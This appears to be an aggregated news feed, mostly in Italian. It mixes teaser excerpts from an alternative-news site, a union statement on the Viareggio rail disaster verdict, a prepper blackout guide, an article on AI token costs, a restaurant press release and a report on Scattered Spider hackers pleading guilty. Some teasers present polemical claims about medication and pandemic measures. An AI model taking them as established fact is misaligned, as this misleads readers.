Di Joshua Stylman Pillole per svegliarsi, pillole per dormire Pillole, pillole, pillole ogni giorno della settimana Pillole per camminare, pillole per pensare Pillole, pillole, pillole per la famiglia – St. Vincent Il mondo sta impazzendo, o è solo che tutti prendono qualcosa? Mi guardo intorno e, sinceramente, non riesco più a capirlo. […]
L'articolo Pillole: non ti sei ammalato. Sei stato arruolato proviene da Come Don Chisciotte.
Di Nicola Bielli per ComeDonChisciotte.org “Britannia rules the waves” di Nicholas Habbe: Britannia – armata di lancia, elmo e scudo in rilievo con le armi reali britanniche – è seduta in una quadriga insieme a Nettuno, armata del suo tridente. Mentre l’Europa assiste all’ennesima escalation del confronto tra NATO e Russia, una domanda continua […]
L'articolo La City contro la Russia? Dietro la crisi europea il ritorno dell’antica guerra tra il mare e la terra proviene da Come Don Chisciotte.
Federico Dal Cortivo per il quotidiano l’Adige di Verona ha intervistato il prof. Andrea Zhok filosofo accademico, professore di antropologia filosofica e filosofia morale presso l’Università di Milano, ricercatore e saggista. Ha curato la prefazione del saggio di Frank Furedi, professore di Sociologia all’Università del Kent, a Canterbury “I confini contano. Perché l’umanità deve riscoprire l’arte […]
L'articolo Prof. Andrea Zhok: “La cancellazione dei confini nazionali è funzionale ai grandi interessi finanziari” proviene da Come Don Chisciotte.
Di Ali Ahmadi, The Cradle L’accordo quadro che ha posto fine alla guerra del 2026 con l’Iran è stato interpretato dalla maggior parte di Washington come una concessione. I commentatori conservatori considerano il memorandum d’intesa (MoU) come una sorta di “ricompensa” concessa a un Paese che avrebbe dovuto essere lasciato a fare i […]
L'articolo Stati Uniti-Iran: il cessate il fuoco di una guerra che Washington non può più sostenere proviene da Come Don Chisciotte.
Di Guido Cappelli Le ultime elezioni politiche, nell’ormai lontano settembre 2022, videro la partecipazione di ben tre liste che erano espressione, in varia misura, di quell’“area del dissenso” nata e cresciuta al calor delle lotte con la follia pandemica e il mostruoso dispositivo autorizzatorio noto come green pass‒ un vulnusalla libertà civile e […]
L'articolo La rana, lo scorpione e il mondo del dissenso proviene da Come Don Chisciotte.

L'articolo Contenuti con intelligenza artificiale: perché il prompt non basta proviene da FullPress.
La rapida diffusione degli Agenti AI sta creando un ecosistema sempre più complesso nel quale modelli linguistici, strumenti esterni e componenti aggiuntivi collaborano per svolgere attività operative. Questa architettura modulare, però, sta aprendo una nuova superficie di attacco che ricorda da vicino le vulnerabilità già viste nel mondo open source e nei marketplace di applicazioni. […]
L'articolo Falsa skill elude gli scanner e a raggiunge più di 26.000 agenti AI proviene da Securityinfo.it.
Ieri sera, 25 giugno 2026, la Quarta Sezione Penale della Corte di Cassazione ha reso definitive le condanne per la strage ferroviaria di Viareggio del 29 giugno 2009, in cui persero la vita 32 persone e oltre un centinaio rimasero ferite. Rigettati i ricorsi degli imputati, è confermata tra le altre la condanna a cinque anni per Mauro Moretti, ex amministratore delegato di Ferrovie dello Stato e RFI.
USB Toscana esprime vicinanza ai familiari delle vittime e a tutte le lavoratrici e i lavoratori ferroviari che per diciassette anni hanno tenuto viva la memoria e la battaglia per la giustizia.
Una giustizia parziale, strappata metro per metro
Questa condanna definitiva è un risultato importante, ma non cancella né le ferite di chi ha perso una persona cara, né quelle prodotte dal percorso giudiziario stesso. Nel 2021 la Cassazione aveva dichiarato prescritti i reati di omicidio colposo, non riconoscendo l'aggravante della violazione delle norme sulla sicurezza sul lavoro. Trentadue persone morte, e l'omicidio andato in prescrizione: un paradosso che rivela tutto il limite di un sistema che tutela i potenti più delle vittime. Tutte le condanne riguardano il solo reato di disastro ferroviario colposo, l'unico sopravvissuto alla ghigliottina della prescrizione. Come ricordano i familiari: la prescrizione non è un'assoluzione.
Le responsabilità sono di classe, non solo individuali
Nel processo è emersa una deliberata politica aziendale improntata al risparmio sulla sicurezza e alla massimizzazione dei profitti, con un rischio consapevolmente scaricato su lavoratori e cittadini. Quella notte non fu una fatalità: fu il frutto della ricerca del profitto a tutti i costi. I tagli al personale, la deregolamentazione della manutenzione, l'esternalizzazione a catena delle responsabilità erano il sistema. Moretti ne era il volto pubblico, non un'eccezione. Cinque anni di pena per 32 vite spezzate non è la giustizia che queste famiglie meritano. Lo ricorda bene Daniela Rombi, presidente de "Il Mondo che vorrei", che nella strage perse una figlia di ventuno anni: "Sette tribunali hanno detto che sono colpevoli e la prescrizione non è un'assoluzione. Per noi restano colpevoli anche dei reati prescritti."
La lotta deve continuare: salari, salute e sicurezza sul lavoro
Viareggio non è un caso isolato: è il punto più tragico di una linea che attraversa decenni di tagli, precarizzazione e smantellamento delle tutele. Ogni anno in Italia muoiono migliaia di lavoratrici e lavoratori, e la risposta giudiziaria arriva decenni dopo, ridotta dalla prescrizione. Non basta. USB si batte ogni giorno su tre fronti inscindibili: salari dignitosi, salute nei luoghi di lavoro, sicurezza reale — non quella scritta nei contratti e ignorata nei fatti. Lo abbiamo fatto nelle vertenze, negli scioperi contro i piani industriali che svuotano gli organici, nelle lotte di chi lavora in condizioni insicure senza voce per dirlo. La logica che ha prodotto Viareggio, il profitto prima delle persone, è la stessa che USB contrasta ogni giorno nei trasporti, nella logistica, nella scuola, nella sanità, nell'industria. Non si tratta di sicurezza come voce di bilancio: si tratta di vite umane da tutelare.
Alle famiglie che hanno lottato per diciassette anni diciamo: siete stati voi i veri protagonisti di questa storia. Noi non vi lasceremo da soli.
USB Toscana

netqmail sono ora compatibili con le nuove versioni di gcc e clang.netqmail-1.07 i vecchi sorgenti di netqmail

Nell’aprile del 2025, la penisola Iberica con gran parte della Francia, affronta un blackout su larga scala per diverse ore, causato da un malfunzionamento della linea di distribuzione elettrica.
All’epoca parlammo già di questo episodio con un articolo ad hoc.
Quest’anno, purtroppo, è toccato al nostro paese.
Negli ultimi giorni diverse zone del Nord Italia sono rimaste improvvisamente senza energia elettrica. Guasti alle linee e cabine elettriche hanno lasciato centinaia di famiglie al buio per diverse ore. Episodi simili sono stati segnalati in numerose aree del Paese.
Per molti si è trattato semplicemente di un disagio temporaneo: qualche ora senza luce, il condizionatore fermo e il frigorifero spento. Ma questi eventi rappresentano anche un’occasione per fermarsi a riflettere su un aspetto che spesso diamo per scontato: quanto dipendiamo dall’energia elettrica?
Fino a pochi decenni fa un’interruzione della corrente significava principalmente accendere una candela e attendere il ritorno dell’energia. Oggi la situazione è completamente diversa. La nostra vita quotidiana ruota attorno all’elettricità: lavoriamo da casa, comunichiamo attraverso Internet, paghiamo con strumenti elettronici, utilizziamo cancelli automatici, pompe dell’acqua, sistemi di allarme, elettrodomestici e dispositivi medici. Basta osservare una normale abitazione per rendersi conto di quanto ogni attività dipenda, direttamente o indirettamente, dalla presenza della corrente.
Naturalmente nessuno può affermare che questi blackout siano il segnale di un imminente collasso della rete elettrica italiana. Sarebbe una conclusione affrettata e priva di fondamento. Tuttavia è altrettanto vero che le reti di distribuzione stanno affrontando nuove sfide. Le estati sempre più calde comportano un utilizzo massiccio dei climatizzatori, gli eventi meteorologici estremi diventano più frequenti e molte infrastrutture, realizzate decenni fa, richiedono continui interventi di manutenzione e ammodernamento. In questo contesto è ragionevole aspettarsi che episodi di interruzione dell’energia possano verificarsi con maggiore frequenza rispetto al passato.
Il Sole 24 Ore spiega bene cosa sta accadendo, cosi come il Post.
La preparazione, però, non nasce dalla paura. Nasce dal buon senso.
Uno dei principi fondamentali del prepping consiste proprio nel prepararsi agli eventi più probabili, non necessariamente a quelli più catastrofici. Un blackout di alcune ore è infinitamente più probabile di molti altri scenari di cui spesso si parla sui social. Eppure sono proprio questi piccoli eventi a coglierci impreparati.
Provate ad immaginare una normale serata estiva. Fuori ci sono oltre trenta gradi, il sole è appena tramontato e improvvisamente tutta la casa rimane al buio. Il condizionatore si spegne, il Wi-Fi scompare, il cancello automatico non si apre più e la batteria del telefono è quasi scarica. Se l’interruzione dovesse protrarsi per qualche ora, anche il frigorifero inizierebbe lentamente a perdere la propria capacità di conservazione e molte persone inizierebbero a chiedersi semplicemente: “E adesso cosa faccio?”
Le principali cause sono:
In molti casi non è la produzione di energia a mancare, ma è la rete di distribuzione locale ad andare in difficoltà.
Caldo, blackout e città sempre più invivibili: non è un caso.
I cavi elettrici che portano energia nelle case passano sottoterra.
Quando aumenta l’uso dei condizionatori, si surriscaldano e devono disperdere più calore.
Il problema? Coprendo il suolo naturale con asfalto e cemento, nelle città le temperature salgono molto di più (a Torino oltre 65°C sull’asfalto). Questo impedisce ai cavi di raffreddarsi.
Risultato:
E non finisce qui:
Il punto è semplice: Il consumo di suolo non è progresso. Il È uno spreco che crea problemi reali per tutti. (nota personale a cura di Lavino Pasquale)

Molti pensano semplicemente:
“Si spegne la luce.”
In realtà gli effetti possono essere molto più ampi.
Ad esempio:
La differenza tra vivere questa situazione con tranquillità oppure con ansia spesso dipende da pochi semplici accorgimenti preparati in anticipo. Avere una torcia facilmente raggiungibile evita di cercare una candela al buio. Una power bank mantenuta carica consente di utilizzare il telefono anche dopo diverse ore. Una piccola radio portatile permette di ricevere informazioni nel caso in cui le reti dati risultino congestionate o temporaneamente non disponibili. Sono oggetti di uso comune, economici e facilmente reperibili, ma che acquistano un valore enorme proprio quando vengono realmente utilizzati.
Anche il comportamento durante un blackout può fare la differenza. Una delle prime reazioni istintive è quella di aprire continuamente il frigorifero per controllare il cibo. In realtà ogni apertura disperde il freddo accumulato, riducendo il tempo di conservazione degli alimenti. Se lo sportello rimane chiuso, un frigorifero moderno riesce generalmente a mantenere una temperatura sicura per circa quattro ore, mentre un congelatore pieno può conservare gli alimenti anche per uno o due giorni.
Frigo e Congelatore – la prima preoccupazione
in caso di disservizio elettrico (blackout), il frigorifero è l’elettrodomestico che occupa il primo posto nei nostri pensieri.
Per ovvie ragioni perderà relativamente velocemente la capacità di raffreddamento degli alimenti, così come quella di congelamento, la cosa sarà più celere nel momento in cui apriamo lo sportello.
Ebbene c’è una alternativa di backup anche per questo.
Il pozzetto congelatore ad apertura verticale lavora meglio.
Il frigorifero ha lo sportello ad apertura frontale, per tanto l’aria fredda incamerata, essendo più pesante e posizionata sul fondo della camera, ad ogni apertura uscirà completamente facendo entrare aria più calda.
Il pozzetto congelatore invece aprendosi verso l’alto mantiene più facilmente l’aria fredda incamerata, oltre a consumare meno corrente di un qualsiasi frigorifero.
Il dubbio spontaneo che sorge è: il pozzetto però congela! È possibile con qualche accorgimento intelligente adattarne l’uso come frigorifero.

Prima di tutto occorre procurarsi una presa termostata con sonda, quest’ultima andrà inserita all’interno del congelatore in modo da rilevare la temperatura.
La presa poi va collegata ad una power station in modo da alimentare il pozzetto in caso di blackout.
Impostare la temperatura della presa termostata sui 4°\6° che è orientativamente quella del frigorifero.
Collegare poi un pannello solare alla power station.

Come funziona il tutto? Il pozzetto comincerà a raffreddare, ma quando raggiungerà la temperatura impostata sulla presa, questa toglierà alimentazione fino a quando la temperatura del pozzetto non incomincia ad essere più alta di quella impostata
Quando manca la corrente:
Vale la pena ricordare anche che non tutti i sistemi di pagamento continuano a funzionare durante un’interruzione prolungata. Alcuni negozi potrebbero non riuscire ad utilizzare i terminali POS, i distributori di carburante potrebbero essere fuori servizio e perfino la rete telefonica, se il blackout dovesse protrarsi a lungo, potrebbe iniziare a risentirne con il progressivo esaurimento delle batterie di backup installate presso le stazioni radio base.
Per questo motivo l’Associazione Italiana Prepper invita da sempre a sviluppare una cultura della resilienza domestica. Non significa riempire il garage di attrezzature costose o immaginare scenari apocalittici. Significa semplicemente essere in grado di affrontare serenamente le prime ventiquattro o quarantotto ore di un imprevisto, riducendo lo stress e aumentando la sicurezza della propria famiglia.
Prepararsi ad un blackout è probabilmente una delle forme di prevenzione più semplici, economiche e concrete che ogni cittadino possa mettere in pratica. Una torcia, una radio, una riserva d’acqua, qualche alimento pronto al consumo e una fonte di energia portatile rappresentano un investimento minimo rispetto alla tranquillità che possono offrire quando tutto, improvvisamente, si spegne.
L’Associazione Italiana Prepper consiglia di predisporre un piccolo kit dedicato.
In fondo è proprio questa la filosofia del prepping: non aspettare che si verifichi un’emergenza per iniziare a chiedersi cosa sarebbe stato utile avere. Prepararsi prima significa affrontare dopo qualsiasi imprevisto con maggiore lucidità, sicurezza e consapevolezza. Perché la resilienza non si improvvisa nel momento del bisogno: si costruisce un piccolo passo alla volta, molto prima che si spengano le luci.
Puoi affrontare serenamente 24 ore senza corrente?
L'articolo Blackout sempre più frequenti: siamo davvero preparati? proviene da Associazione Italiana Preppers.

Immagine in evidenza rielaborata con Intelligenza Artificiale
Negli ultimi mesi, molte delle aziende che avevano sottoscritto contratti con OpenAI o Anthropic hanno avuto una brutta sorpresa. Lo scorso aprile, la società di noleggio auto con conducente Uber ha per esempio scoperto di aver già bruciato tutto il budget annuale destinato all’intelligenza artificiale. Una situazione simile si è verificata anche dalle parti del gigante dei supermercati Walmart, che ha introdotto in tutta fretta un limite all’utilizzo dei large language model da parte dei suoi dipendenti.
Un’azienda rimasta anonima avrebbe invece speso 500 milioni di dollari in un solo mese a causa dell’utilizzo sfrenato di Claude da parte dei suoi dipendenti, mentre persino un colosso come Meta ha imposto dei limiti all’utilizzo dei sistemi d’intelligenza artificiale generativa, come hanno fatto anche Amazon, AT&T, Brex e numerose altre società.
Che cos’è successo? Non eravamo nell’epoca del tokenmaxxing, ovvero la gara a chi usa di più l’intelligenza artificiale all’interno delle aziende? Per capire come mai la situazione sia cambiata così rapidamente basta sapere che, nel corso della prima metà del 2026, OpenAI e Anthropic hanno entrambi cambiato le condizioni dei contratti aziendali: non più una tariffa fissa anche per usare i loro sistemi più avanzati e specialistici, ma una tariffa a consumo – basata sulla quantità di “token” elaborati dai vari ChatGPT Codex, Claude Cowork e altri ancora – che ha fatto esplodere i costi in maniera imprevista.
E così, praticamente da un giorno all’altro, i token – oggetto fino a poco fa noto soltanto agli addetti ai lavori – sono diventati uno degli argomenti più discussi dai manager di mezzo mondo. A questo punto, fermiamoci un secondo: che cosa sono i token?
In sintesi estrema, i token sono l’unità di testo fondamentale che i modelli linguistici elaborano quando leggono, interpretano o generano informazioni. Nella maggior parte dei casi, un token non equivale a una parola, ma a una porzione di essa (in inglese, in media, quattro caratteri). Può però anche essere un segno di punteggiatura, uno spazio o un carattere speciale. Nel momento in cui un modello deve elaborare la frase “il gattino sta dormendo sul divano?”, la scompone in token con una forma simile a “il / gatt / ino / sta / dorm / endo / sul / divano / ?”.
Ogni volta che un modello linguistico elabora una forma testuale, indipendentemente dall’obiettivo o dalle mansioni per cui è impiegato, sta quindi elaborando una sequenza di token: li trasforma in rappresentazioni numeriche, li confronta con il contesto già ricevuto e calcola quale token abbia maggiore probabilità di venire dopo. È così che risponde a una domanda, riassume un documento, scrive codice o traduce una frase: non “capendo” le parole, ma prevedendo la sequenza di token più coerente con ciò che gli è stato chiesto. È il meccanismo noto come “next token prediction”.
Un po’ come il consumo elettrico si calcola in kilowattora o il traffico internet in gigabyte, il lavoro svolto da un’intelligenza artificiale generativa si misura in token. Con una differenza: il consumo effettivo può crescere molto rapidamente, perché non dipende solo dalla lunghezza della richiesta o della risposta finale, ma anche dalla quantità di informazioni che il modello deve leggere prima di produrla. Una domanda posta all’inizio di una chat con Claude consumerà quindi meno token della stessa domanda inserita in una lunga conversazione, perché il “contesto” che il modello linguistico deve analizzare è, nel primo caso, molto più ridotto.
Un ultimo elemento importante è che i token sono elementi linguistici nel caso degli LLM, mentre nei modelli che generano immagini possono corrispondere a porzioni di immagine, nei modelli audio a frammenti di suono, nei modelli video a sequenze di informazioni che combinano immagini, movimento e durata. Il principio però resta lo stesso: qualunque sia il contenuto generato — testo, voce, musica, immagini o video — il modello non lo elabora come un blocco unico, ma lo scompone in unità più piccole, le trasforma in numeri e lavora su quelle.
Un altro aspetto importante è che nel corso degli anni, grazie alla crescente efficienza dei modelli, il costo dei token è crollato: se nel 2023 il prezzo di un LLM come GPT-4 era di 30 dollari per milione di token in fase di input (quindi il testo che inseriamo noi) e di 60 dollari in output (quindi quello generato dall’AI), oggi GPT-5.5 costa rispettivamente 5 e 30 dollari. Secondo alcune stime, dal 2020 al 2026 i prezzi medi per token sono calati addirittura di 600 volte.
Ma se il prezzo dei token è crollato – e possiamo sostenere che sia sceso significativamente anche per le società che sviluppano LLM, pur in assenza di dati trasparenti a riguardo – com’è possibile che il passaggio a una tariffa a consumo abbia fatto esplodere i costi, al punto da consumare in pochi mesi l’intero budget annuale di Uber e costringere Meta a limitare l’uso dell’intelligenza artificiale in ufficio?
La ragione è duplice. Da una parte, i modelli più avanzati e basati su “ragionamento” – che scompongono la richiesta in più passaggi – consumano molti più token delle loro controparti tradizionali (e spesso forniscono risposte più lunghe). Dall’altra, la diffusione dei modelli linguistici e il loro utilizzo spesso intensivo (e non mirato) hanno provocato un enorme aumento dei token da elaborare. Un singolo dipendente che usa ogni giorno un modello di frontiera può quindi consumare molti più token rispetto anche solo a due anni fa.
Unendo questi due aspetti, si capisce perché Google – come spiegato dal CEO Sundar Pichai – sia passato in un trimestre da 10 a 16 miliardi di token elaborati ogni minuto. OpenAI ha invece dichiarato che la sua piattaforma API (cioè l’infrastruttura attraverso cui aziende e sviluppatori collegano i propri software ai modelli di OpenAI) è passata da 6 a oltre 15 miliardi di token al minuto tra l’autunno 2025 e la primavera 2026, dopo essere già cresciuta di circa venti volte nei due anni precedenti.
Questa impennata del consumo di token è stata a lungo nascosta dalle tariffe fisse ed è invece improvvisamente diventata evidente con il passaggio a una tariffazione a consumo: “L’intelligenza artificiale è oggi la voce di spesa che sta aumentando più rapidamente dei budget aziendali”, si legge in un report Deloitte di inizio anno. “Alcune società hanno affermato che oggi l’AI consuma fino alla metà della loro spesa in tecnologie dell’informazione. Nonostante il prezzo unitario dei token stia calando, la spesa complessiva delle aziende per i sistemi di intelligenza artificiale, e la loro scala di utilizzo, stanno aumentando. Il numero di utenti, la complessità dei modelli e l’intensità dei carichi di lavoro porteranno probabilmente a un maggiore consumo di token e, di conseguenza, a costi più elevati”.
Il passaggio a una fatturazione a consumo è probabilmente il principale responsabile dell’impennata del fatturato di Anthropic, passato dai 4,8 miliardi di dollari del primo trimestre 2026 ai 10,9 miliardi attesi per il secondo trimestre. Sarà però interessante capire che cosa succederà nel trimestre ancora successivo, quando i manager delle aziende avranno definitivamente fatto i conti con le spese fuori controllo per utilizzare Claude Code, Cowork o gli altri sistemi avanzati di Anthropic: “I costi della computazione sono ormai diventati una priorità per i direttori finanziari e per i consigli d’amministrazione”, ha spiegato al Financial Times Costi Perricos, responsabile AI di Deloitte. “[OpenAI e Anthropic] hanno insegnato a utenti e aziende che l’intelligenza artificiale fosse economica o addirittura gratis, ma le cose non stanno affatto così”.
Carter Busse, dirigente della società di software Workato, ha raccontato sempre al Financial Times come l’utilizzo dell’intelligenza artificiale sia esploso tra i suoi dipendenti non appena hanno iniziato a sfruttare gli agenti AI. La brutta sorpresa è arrivata alla prima fattura a consumo di Anthropic: “La nostra spesa è salita improvvisamente di 7 volte e ho pensato: ‘merda, abbiamo creato un mostro’”, ha spiegato Busse, che adesso sta spronando i suoi dipendenti a usare modelli più economici e in modo più responsabile. Ancora più preoccupanti per i colossi dell’intelligenza artificiale sono le dichiarazioni del presidente di Cisco Jeetu Patel: “Il costo dei token è molto più elevato dell’effettivo valore che essi generano su larga scala”.
Nel momento in cui le aziende iniziano a sobbalzare di fronte alle bollette e a domandarsi se il gioco valga la candela, OpenAI e Anthropic si trovano di fronte a quello che lo stesso Sam Altman ha definito “un enorme problema”. E come si risolve questo problema? Stando alle indiscrezioni, nell’unico modo (per ora) possibile: tagliando i prezzi pur di non perdere clienti, come starebbe per fare OpenAI anticipando una possibile mossa di Anthropic in questa stessa direzione.
Come ha riassunto Ed Zitron sul suo blog, “sono passati meno di tre mesi da quando le aziende hanno iniziato a pagare il vero costo dei servizi basati su LLM e sono già così chiaramente infuriate che sia Anthropic sia OpenAI stanno pianificando di tagliare il prezzo dei loro servizi già in perdita, facendo probabilmente crollare il fatturato mentre aumentano i costi complessivi”.
Il rischio è che i due colossi dell’intelligenza artificiale generativa si trovino alle prese con la più classica alternativa del diavolo: se non tagliano i prezzi, le aziende potrebbero ridurre l’impiego dei modelli linguistici (e come abbiamo visto, parecchie l’hanno già fatto). Se tagliano i prezzi, riducono gli introiti di società già oggi in rosso per decine di miliardi di dollari l’anno.
E qui si crea un secondo vicolo cieco: se le aziende tagliano l’uso dell’AI generativa, a cosa serviranno i 190 gigawatt di capacità elettrica per data center già pianificati, in una corsa globale che secondo McKinsey potrebbe richiedere investimenti fino a 7mila miliardi di dollari entro il 2030? E se invece OpenAI e Anthropic devono tagliare i loro prezzi per non perdere clienti aziendali, come faranno a rispettare i contratti da centinaia e centinaia di miliardi di dollari che hanno sottoscritto con Microsoft, Amazon, Google, CoreWeave e altri fornitori di potenza di calcolo?
A questo punto, viene da chiedersi che cosa potrebbe succedere se anche noi utenti comuni di ChatGPT e Claude fossimo costretti a pagare una tariffa a consumo invece di quelle fisse, che per gli usi più intensivi coprono solo una piccola parte dei costi reali.
In verità, qualcosa del genere si sta già verificando. A partire da giugno 2026, gli utenti di GitHub Copilot – ovvero l’assistente AI per scrivere codice collegato alla piattaforma per la condivisione di progetti software di proprietà di Microsoft – sono passati da un abbonamento fisso mensile a un sistema di fatturazione legato anche al consumo di token. Secondo quanto riporta un utente, il prezzo da lui pagato potrebbe salire da 29 fino a 750 dollari al mese; un altro segnala che nel suo caso il costo potrebbe schizzare fino a 3mila dollari.
Attenzione, perché una parte della responsabilità va attribuita al cosiddetto “vibe-coding”, ovvero la scrittura di codice in cui tutti i passaggi tecnici sono affidati all’intelligenza artificiale, aumentando drasticamente il consumo di token. Difficile però incolpare i “vibe-coders” per il loro uso indiscriminato di Copilot, visto che è stata proprio Microsoft a incoraggiarlo e adesso invece lo punisce con bollette fuori controllo.
E se anche OpenAI e Anthropic, conclusa la guerra al ribasso per conquistare gli utenti, dovessero decidere di far pagare i token in base al consumo? È qualcosa che, in realtà, potrebbe avvenire in un futuro non troppo distante, vista la probabile quotazione in borsa di entrambe e la conseguente necessità di ridurre le stratosferiche perdite (per colmare le quali hanno dovuto raccogliere finanziamenti tra i più elevati della storia) e mostrare bilanci in miglioramento.
A questo punto, la domanda sorge spontanea: quanto dovremmo pagare per usare gli strumenti d’intelligenza artificiale se non avessimo a disposizione tariffe fisse tenute artificialmente basse? Una possibile risposta ce la fornisce una simulazione condotta dalla società di analisi SemiAnalysis. Secondo queste stime, il “vero prezzo” (inteso come il prezzo che pagheremmo se fossimo soggetti ad abbonamenti a consumo pari a quelli delle API) di un abbonamento a ChatGPT da 20 dollari al mese potrebbe arrivare fino a 700 dollari, mentre un abbonamento Pro da 200 dollari può raggiungere anche 14mila dollari (situazione simile per Anthropic).
Il problema, insomma, è sempre lo stesso: l’intelligenza artificiale generativa costa troppo e un modello di business sostenibile non è ancora all’orizzonte. È una situazione che riguarda però soprattutto i più avanzati modelli di frontiera sviluppati negli Stati Uniti. E che potrebbe invece avvantaggiare l’ecosistema AI della Cina.
Il segnale più evidente arriva sempre dal consumo di token. Secondo i dati di OpenRouter, a giugno i tre modelli più utilizzati per quantità di token elaborati sono tutti cinesi: MiMo di Xiaomi, MiniMax e DeepSeek. È un segnale di come una quota crescente dell’uso degli LLM – a partire da quello che avviene all’interno di applicazioni, strumenti di lavoro, agenti e servizi aziendali – si stia spostando verso i più economici modelli made in China.
Ad avvantaggiare la Cina è un mix di fattori, tra cui troviamo l’energia meno cara, i data center più economici, le infrastrutture sostenute dallo stato, l’aggressiva concorrenza interna e il fatto che i modelli siano spesso progettati per consumare meno, grazie a scelte di architettura informatica e anche a causa delle restrizioni che impediscono alla Cina di avere accesso ai chip più avanzati. Il vantaggio cinese diventa ancora più evidente guardando i prezzi: i modelli cinesi più usati costano infatti una frazione dei modelli di punta di OpenAI e Anthropic.
Il prezzo per milione di token è però solo una parte del costo reale. Come ha spiegato il ricercatore indipendente Wong Qi Han a CNA, se un modello sbaglia spesso e quindi richiede più tentativi, funziona peggio in una lingua straniera, ha maggiore latenza o pone problemi di sicurezza e compliance, il risparmio iniziale può essere illusorio. In linea teorica, la metrica decisiva non dovrebbe essere il costo per milione di token, ma quanto spendiamo per ottenere un risultato soddisfacente (per gli utenti comuni) o il ritorno sull’investimento (per le aziende). Il problema è che entrambe queste metriche sono estremamente difficili da misurare.
È possibile che i più costosi modelli statunitensi continueranno a essere usati per le attività complesse, mentre quelli cinesi potrebbero conquistare la fascia più ampia del mercato, quella degli usi quotidiani come supporto professionale o assistente personale.
Tutto è bene quel che finisce bene? Non è detto. Per la Cina, il rischio principale è l’eccessiva concorrenza sui prezzi e la compressione dei margini, che potrebbe mettere a rischio la profittabilità di DeepSeek e compagni. Per gli Stati Uniti, il rischio è invece che essere esclusi (a causa dei prezzi elevati) dalla massa dei casi d’uso quotidiani e ad alto volume causerebbe non tanto (o non solo) una riduzione dei potenziali ricavi, ma potrebbe provocare soprattutto una riduzione della potenza di calcolo necessaria.
Considerando le cifre immense che stanno venendo investite in GPU, cloud e data center, ritrovarsi con una richiesta di potere computazionale inferiore alle attese potrebbe trasformare l’attuale corsa alle infrastrutture in un enorme azzardo finanziario. E a quel punto, la temuta bolla dell’intelligenza artificiale potrebbe scoppiare per davvero.
L'articolo L’economia dei token e il vero prezzo dell’intelligenza artificiale proviene da Guerre di Rete.
Un’oasi cittadina di condivisione che unisce caffetteria, ristorante gourmet con cucina a
vista, pizzeria d’autore e aree esperienziali per famiglie e amanti del relax.
MILANO – Nel cuore pulsante di uno dei quartieri a maggior sviluppo e dinamismo della
città, apre ufficialmente i battenti Cascina Corten, la nuova realtà culinaria ed esperienziale
all’interno di Cascina Merlata Spazio Vivo.
Uno spazio poliedrico e multifunzionale di ampio respiro,
pensato per accogliere i cittadini in ogni momento della giornata, dalle prime luci del
mattino fino a tarda notte.

La struttura nasce con una missione precisa: offrire un’esperienza gastronomica raffinata,
flessibile e accessibile, capace di far sentire ogni ospite come a casa propria, immerso in
una suggestiva cornice verde.

Dalla colazione alla cena: il ritmo della giornata a Cascina Corten
La proposta si adatta fluidamente alle esigenze di una clientela diversificata e dinamica:
● Il Mattino (dalle 07:00): Una colazione curata, con una selezione di caffetteria
nazionale e internazionale per iniziare la giornata con il piede giusto.
● Il Pranzo: Soluzioni rapide, gustose e di alta qualità, pensate specificamente per i
professionisti e i lavoratori dei vicini uffici della zona.
● L’Aperitivo al Tramonto: Un’atmosfera conviviale in cui rilassarsi con un drink,
incontrando amici e parenti tra una chiacchiera e l’altra.
● La Cena e la Pizzeria: Una proposta attenta alle tradizioni culinarie ma aperta
all’innovazione, arricchita da un’elegante pizzeria. Al primo piano, gli ospiti potranno
vivere l’esperienza di un ristorante gourmet.
● Brunch: Un appuntamento fisso per rigenerarsi nel weekend, che unisce il calore
della tradizione ai trend internazionali. Una proposta ricca e flessibile che spazia
dalle dolci tentazioni della pasticceria artigianale a piatti salati ricercati, uova
preparate al momento e sfiziosità gourmet.

Un design ripensato tra interno ed esterno.
Il progetto ha previsto una profonda riorganizzazione della struttura, valorizzando sia gli
spazi interni che le ampie aree verdi esterne:
● Interni Luminosi ed Eleganti: Ambienti moderni tinti con tonalità pastello,
illuminazione LED e un grande bancone multifunzionale in materiali naturali.
● Primo Piano: La zona pizzeria è stata impreziosita da una struttura interamente in
vetro che la rende visibile e attrattiva anche dall’esterno.
● Le Aree Esterne Modulari: Un piazzale con gazebi rimovibili per gli eventi all’aperto,
una zona relax sul prato con divanetti e pouf , e un’innovativa area “mare” con
ombrelloni e fondo parzialmente sabbioso per ricreare un’atmosfera balneare in
piena città.

Strizza l’occhio alle famiglie
Cascina Corten si distingue nettamente nel panorama locale per l’estrema
personalizzazione del servizio (dalle insalate su misura alle pizze componibili) e per una
spiccata attenzione al mondo kids.

–
L'articolo Milano si rifà il look nel verde: nasce “Cascina Corten”, il nuovo polo poliedrico del gusto a Cascina Merlata Spazio Vivo proviene da InfoMilano.news.
Two men pleaded guilty in the United Kingdom this week to criminal charges stemming from an August 2024 cyberattack that crippled Transport for London, the entity responsible for the public transport network in the Greater London area. The duo were key members of a prolific cybercrime group known as Scattered Spider, and their guilty pleas came on the first day of what was expected to be a six-week trial.

Owen Flowers (left) 18, and Thalha Jubair, 20. Image: UK National Crime Agency (NCA).
Thalha Jubair, 20, of East London and 18-year-old Owen Flowers of Walsall admitted conspiring to commit unauthorized acts against Transport for London computer systems and causing risk of serious damage to human welfare. According to a report from the BBC, Flowers alone admitted to being part of a conspiracy to hack into U.S. based healthcare providers SSM Health Care Corporation and Sutter Health in September 2024.
Jubair is also wanted by U.S. law enforcement agencies. In September 2025, prosecutors in New Jersey unsealed an indictment alleging Jubair and other Scattered Spider members committed computer fraud, wire fraud, and money laundering in relation to 120 computer network intrusions involving 47 U.S. entities between May 2022 and September 2025, and that the group’s victims paid at least $115 million in ransom payments.
In July 2025, KrebsOnSecurity reported that Flowers and Jubair were arrested in the United Kingdom in connection with Scattered Spider ransom attacks against the retailers Marks & Spencer and Harrods, and the British food retailer Co-op Group. Multiple sources familiar with those investigations said Flowers was the Scattered Spider member who anonymously gave interviews to the media in the days after the group’s September 2023 ransomware attacks disrupted operations at Las Vegas casinos operated by MGM Resorts and Caesars Entertainment.
According to prosecutors, Jubair co-ran a bustling Telegram channel called Star Chat, the home of a SIM-swapping group that used voice- and SMS-based phishing attacks to steal credentials from employees at the major wireless providers in the U.S. and U.K. The group would then use that access to sell a service that could redirect a target’s phone number to a device the attackers controlled and intercept the victim’s calls and text messages (including one-time codes for multi-factor authentication).

A receipt from Star Fraud Chat’s SIM-swapping service targeting a T-Mobile customer after the group gained access to internal T-Mobile employee tools. “Rocket Ace” was one of Jubair’s hacker handles, according to U.S. prosecutors.
